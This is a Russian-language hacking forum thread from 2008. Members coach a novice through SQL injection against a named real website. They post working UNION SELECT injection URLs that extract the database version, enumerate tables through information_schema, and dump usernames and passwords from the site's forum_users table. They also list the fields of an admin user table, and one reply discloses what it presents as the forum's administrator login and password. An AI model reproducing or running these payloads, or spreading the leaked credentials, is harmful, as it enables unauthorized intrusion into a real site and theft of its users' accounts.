16.06.2008, 00:59
|
|
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами:
9479722
Репутация:
-1
|
|
А что мне делать со слипой скуляй?
и где взять скрипт с выводом если не секрет?
|
|
|
16.06.2008, 01:00
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
Не слепая!!!!
Открой исходный код страницы и поищи поля 3,4,5,6. Вывод в них
Вот пример
http://www.modvlad.ru/photo/?g=-1+union+select+111,222,version(),444,555,666/*
ищем в коде 444, и рядом видим версию 5.0.45-log
|
|
|
|
16.06.2008, 01:08
|
|
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами:
9479722
Репутация:
-1
|
|
ага нашел! А как теперь сформировать запрос на вывод таблицы?
|
|
|
|
16.06.2008, 01:10
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами:
10485026
Репутация:
1879
|
|
Запрос из базы только Лимитом(!!!) Попробовал вывести всё... опера всю оперативу скушала...
|
|
|
|
16.06.2008, 01:14
|
|
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами:
9479722
Репутация:
-1
|
|
(= ведь это журнал! там новерное одана таблица те оперу села какя нить пост с кучей новостей типа архива или ещё чё нить!
А вот например как мне просканить на таблицу юзер?
|
|
|
|
16.06.2008, 01:15
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Велемир, терпение надо иметь, а не пытаца найти легкий путь  В крайнем случае написать граббер если не хватает терпения 38 таблиц ручками прочекать. И это при том, что первые 16 - системные |
|
|
|
16.06.2008, 01:22
|
|
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами:
9479722
Репутация:
-1
|
|
А чёза это кмс?
и как Лимитом запос мутить?
Последний раз редактировалось Constantine; 16.06.2008 в 01:54..
Причина: флейм
|
|
|
|
16.06.2008, 01:31
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами:
10485026
Репутация:
1879
|
|
Там есть таблица be_users. В ней поля:
-uid
-pid
-tstamp
-username
-password
-admin
-usergroup
-email
И ещё до*** и больше. Вот и вытаскивай.
|
|
|
|
16.06.2008, 01:37
|
|
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами:
9479722
Репутация:
-1
|
|
Покажи запрос плиз
что после http://www.modvlad.ru/photo/?g=-1+union+select+111,222,version(),444,555,666/*
http://www.modvlad.ru/photo/?g=37+union+select+table_name,2,3,4,5,6+from+infor %20mation_schema.tables+limit+38,1/* делал мне для себя надо знать
и как тащить и я вас больше не потревожу! в формате http:// к примеру username плиз оч надо для обучения!
Последний раз редактировалось JoN.SmiT; 16.06.2008 в 01:43..
|
|
|
|
16.06.2008, 01:44
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
На форум
Логин Administrator
Пароль simbol
Есть админка, но в какой таблице пароли хз
Вот тебе запрос для вывода данных юзеров из форума
http://www.modvlad.ru/photo/?g=-1+union+select+111,222,username,user_password,555, 666+from+forum_users/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
